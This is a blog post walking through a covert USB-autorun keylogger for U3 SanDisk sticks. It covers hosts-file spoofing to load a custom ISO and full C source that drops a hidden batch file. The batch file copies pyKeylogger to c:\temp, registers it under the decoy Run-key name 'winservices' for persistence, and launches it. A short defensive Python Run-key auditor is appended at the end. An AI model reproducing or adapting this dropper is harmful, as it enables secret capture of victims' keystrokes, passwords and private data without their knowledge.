Sample code for U3 Sandisk USB autorun
This is just for educational purposes only and meant for keeping this code somewhere accessible. The other night I tried to create a keyboard sniffer which would get installed and running by using the autorun feature of U3 sandisk USB sticks.
I reformatted the U3 ISO by using the incredible u3-autorun project located at:
http://sourceforge.net/projects/u3-autorun/
The tool explains that if you get the LPInstaller utility (the link for downloading it is referenced inside the project package file) to sit in the same directory as the ISO file (cruzer-autorun.iso), then the tool will simply use the local ISO file instead of downloading it from the SanDisk web servers.
Well, the fact is that in my case that didn’t work, so I followed some instructions that I found online: given that the LPInstaller downloads an unsigned/unencrypted ISO file from the web servers, you could simply trick the program into downloading the ISO file from the web server of your choice (i.e.: pointing u3.sandisk.com to 127.0.0.1 by modifying your win32\system32\drivers\etc\hosts file), and that worked like a charm.
Once the new ISO file is deployed in the unwritable partition of the USB stick, you can create an autorun.inf (can’t remember the exact filename, there’s a sample file included though) file in the writable partition and have the autorun program run any program of your choice.
So I grabbed the pyKeylogger from http://pykeylogger.sourceforge.net and modified the code to exclude the Donation nag window which shows up after X days of usage and is veeery easy to disable (when I should have donated to the project instead! I encourage you to do so..it’s a nice piece of software) and recompiled/packaged the whole python keylogger into a windows executable.
Very easy, you could say, although I thought that was it. When I realized that the keylogger remained inside the USB stick after being executed (and I wanted it to be persistent), I had to find a way of making the keylogger copy itself to the user’s hard drive and then find a way of executing it off the hard drive, not off the USB stick.
REMEMBER: This was all done for educational purposes only and never meant to harm anyone.
So these are the two paths that I could have followed:
A) I could have modified the autorun ISO code, generate a new ISO and then replace the U3 ISO with my new one.
B) Use the autorun ISO as-it-is, as I downloaded it from sourceforge.
Unfortunately, or fortunately…? I followed (B). I decided it wouldn’t be so damn much of a workaround to find a way of making the default autorun ISO copy a file and then execute it. Unluckily for me, the autorun.inf file that is supported by the u3-autorun program only takes 1 binary filename (which it probably runs CreateProcess for) but takes absolutely no arguments (or not the way I tried), and of course it doesn’t take batch files either.
But it was around 1, 2am and I didn’t quite find out the latter (batch file execution) until I had already created a whole batch file which took care of xcopying the contents of the ‘dist’ directory (where the pykeylogger distribution resides inside the USB stick) to a temporary directory inside c:\temp.
So once the batch file existed, I found out I couldn’t use a batch filename inside the autorun, and I coded a quick program in C. The C program contains the code that is listed below.
The final formula was:
- The ISO u3-autorun.inf ends up executing my-c-program.exe
- my-c-program.exe creates a hidden batchfile in the user’s c:\windows directory
- the batchfile creates a temporary directory inside c:\temp and copies the contents of the \dist subdirectory inside the USB stick where the keylogger distribution resides to that temporary subdirectory inside c:\temp
- the batchfile creates a registry entry at CurrentVersion\Run calling a batchfile inside the keylogger directory, which ends up executing the keylogger using the local path.
- the batchfile executes the keylogger
- and my-c-program.exe after creating the batchfile executes the batchfile by calling execve and calling cmd.exe using /c batchfilename as parameters.
The reason I had to do all this mess is because:
- I wanted the keylogger to remain persistent, so it would install by inserting the usb stick and stay persistent if the usb stick was removed/the computer was restarted/etc.
- If the pykeylogger is run using a full path and not sitting in the local directory, then certain errors are thrown (and I didn’t mind looking into the source for patching those problems..I should have..?)
- Once the USB stick drive is inserted and the autorun file is executed, I needed to know the full path (drive letter) of the USB stick dist subdirectory (which I worked around at 2am by creating the batch file dynamically from within the exe file, which parses argv[0], instead of going through the MSDN looking for something like GetModuleFileName() that would work)
- I can’t really remember - but it’s 2 am today again..so it’s fair.
Here’s the sample C code so it remains somewhere handy:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy, strtok */
#include <process.h>  /* execve prototype on MinGW/MSVCRT */
#include <windows.h>

#define BATCH_PATH "c:\\windows\\win255.bat"
#define CMD_PATH "c:\\windows\\system32\\cmd.exe"

int
main(int argc, char **argv) {
    FILE *myfile;
    char *params[4];
    char *res = 0x0;
    char final[10000];
    char localpath[255];
    /* Batch template; the %s is replaced with the drive letter taken from argv[0]. */
    char *batch_contents = "@echo off\nmkdir c:\\temp\nmkdir c:\\temp\\win21\nxcopy /E %s\\dist c:\\temp\\win21\\\nc:\ncd c:\\temp\\win21\nreg ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v winservices /t REG_SZ /d c:\\temp\\win21\\winservices.bat\ncls\nwinservices.exe\n\0";

    /* argv for cmd.exe: cmd.exe /c <batch file> */
    params[3] = 0x0;
    params[2] = BATCH_PATH;
    params[1] = "/c";
    params[0] = CMD_PATH;

    myfile = fopen(BATCH_PATH, "w");
    if (myfile == NULL) exit(-1);

    /* First token of argv[0] up to the backslash is the drive letter (e.g. "E:"). */
    strncpy(localpath, argv[0], sizeof(localpath)-1);
    localpath[sizeof(localpath)-1] = 0x00;
    res = strtok(localpath, "\\");
    if (res == NULL) exit(-1);

    _snprintf(final, sizeof(final)-1, batch_contents, res);
    final[sizeof(final)-1] = 0x00;
    fprintf(myfile, "%s", final);
    fflush(myfile);
    fclose(myfile);

    /* Replace this process with cmd.exe running the batch file. */
    execve(params[0], params, NULL);
    return 0;
}
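As a defensive counterpart to the persistence mechanism described above, here is an added Python example (not from the original post) that audits Run-key entries exported from a host and flags script-based entries living in temp directories like the one the batch file registers, plus a check of the NoDriveTypeAutoRun policy bit that blocks AutoRun on removable drives. The Run entries are constructed sample data, not read from a live registry.

```python
from pathlib import PureWindowsPath

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run values
# (value name -> command). The first mirrors the persistence this post describes;
# the others are typical benign entries.
SAMPLE_RUN_ENTRIES = {
    "winservices": r"c:\temp\win21\winservices.bat",
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r"C:\Vendor\updater.exe --quiet",
}

SCRIPT_EXTENSIONS = {".bat", ".cmd", ".vbs", ".js", ".ps1"}
# Scratch locations a legitimate installer rarely uses for a startup entry.
TEMP_ROOTS = (r"c:\temp", r"c:\windows\temp")
USER_TEMP_FRAGMENT = r"\appdata\local\temp"


def command_target(command: str) -> str:
    """Return the program path from a Run-key command, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    # Unquoted: the program is the first whitespace-delimited token.
    return command.split()[0]


def audit_run_entry(name: str, command: str) -> list[str]:
    """Return the reasons an entry looks like script-based persistence (empty if none)."""
    target = command_target(command).lower()
    reasons = []
    if PureWindowsPath(target).suffix in SCRIPT_EXTENSIONS:
        reasons.append("runs a script rather than a binary")
    if target.startswith(TEMP_ROOTS) or USER_TEMP_FRAGMENT in target:
        reasons.append("lives in a temp directory")
    return reasons


def audit_run_entries(entries: dict[str, str]) -> dict[str, list[str]]:
    """Map each suspicious value name to its reasons; clean entries are omitted."""
    return {n: r for n, c in entries.items() if (r := audit_run_entry(n, c))}


def removable_autorun_blocked(no_drive_type_autorun: int) -> bool:
    """HKLM\\...\\Policies\\Explorer\\NoDriveTypeAutoRun: bit 0x04 (DRIVE_REMOVABLE)
    disables AutoRun on removable drives; 0xFF disables it for every drive type."""
    return bool(no_drive_type_autorun & 0x04)
```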